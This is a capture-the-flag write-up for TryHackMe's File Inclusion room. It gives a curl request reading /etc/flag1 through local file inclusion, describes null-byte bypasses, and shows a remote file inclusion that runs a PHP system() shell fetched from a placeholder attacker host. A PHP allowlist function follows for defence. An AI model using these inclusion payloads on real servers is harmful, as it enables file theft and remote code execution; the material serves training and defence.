THM — File Inclusion WriteUp

Fahri Korkmaz
Dec 19, 2021

The File Inclusion room on TryHackMe teaches file inclusion vulnerabilities. It is part of the Junior Penetration Tester path under the Introduction to Web Hacking category. This write-up contains solutions for the 4 challenges at the end of the room.

Challenge 1

The POST parameter “file” is vulnerable to LFI. It is possible to retrieve the flag with the following command:

curl http://10.10.179.245/challenges/chall1.php  -X POST -d "file=/etc/flag1"

Challenge 2

The THM cookie parameter is vulnerable to LFI. The word “Admin” must be inside the cookie parameter, but the user input is not filtered. The string “.php” is appended to the input, hence “%00” is mandatory to include the flag:

Challenge 3

After changing the request type to POST, the file parameter becomes vulnerable to LFI. It is also important to end the file parameter with null (%00). With the following request you can retrieve flag 3:

Challenge 4

The file parameter at /playground.php is vulnerable to remote file inclusion. With this vulnerability it is possible to execute arbitrary commands. A file called “cmd” with the following contents was hosted on the attacker machine:

<?PHP system("hostname"); ?>

The file could be retrieved via the following URL:

http://<attacker_ip>:4444/cmd

After calling the following URL via a GET request it was possible to run PHP code:

http://10.10.179.245/playground.php?file=http://<attacker_ip>:4444/cmd
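
For the defensive side of the four challenges, here is one way the server could resolve the file parameter so that absolute paths, null bytes and remote URLs are all rejected. This is an added example, not code from the room or from the original write-up; the function name resolve_page, the temporary pages directory and the page name "home" are assumptions.

```php
<?php
// Added example, not code from the room. The directory layout and page
// names are assumptions for illustration.

/** Map an untrusted "file" value to a real path under $baseDir, or null. */
function resolve_page(string $input, string $baseDir, array $allowed): ?string
{
    // Null bytes: old PHP versions cut the path at %00, dropping an appended ".php".
    if (strpos($input, "\0") !== false) {
        return null;
    }
    // URL or stream-wrapper prefixes (http://, php://, data:) are never local pages.
    if (preg_match('/^[a-z][a-z0-9+.-]*:/i', $input) === 1) {
        return null;
    }
    // Exact allowlist match; absolute paths and ../ sequences cannot pass this.
    if (!in_array($input, $allowed, true)) {
        return null;
    }
    // Defence in depth: resolve symlinks and confirm the file sits under $baseDir.
    $base = realpath($baseDir);
    $path = realpath($baseDir . '/' . $input . '.php');
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Constructed demo: a temporary pages directory with one legitimate page.
$dir = sys_get_temp_dir() . '/pages_demo_' . getmypid();
mkdir($dir);
file_put_contents($dir . '/home.php', "home page\n");

// Constructed inputs shaped like the values used in the challenges above.
$samples = ['home', '/etc/flag1', "/etc/flag1\0", 'http://<attacker_ip>:4444/cmd'];
foreach ($samples as $s) {
    $p = resolve_page($s, $dir, ['home']);
    printf("%-36s => %s\n", json_encode($s, JSON_UNESCAPED_SLASHES), $p ?? 'rejected');
}

unlink($dir . '/home.php');
rmdir($dir);
```

Only "home" resolves to a path; the other three inputs are rejected. Keeping allow_url_include set to Off in php.ini removes the remote inclusion path independently of this check.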
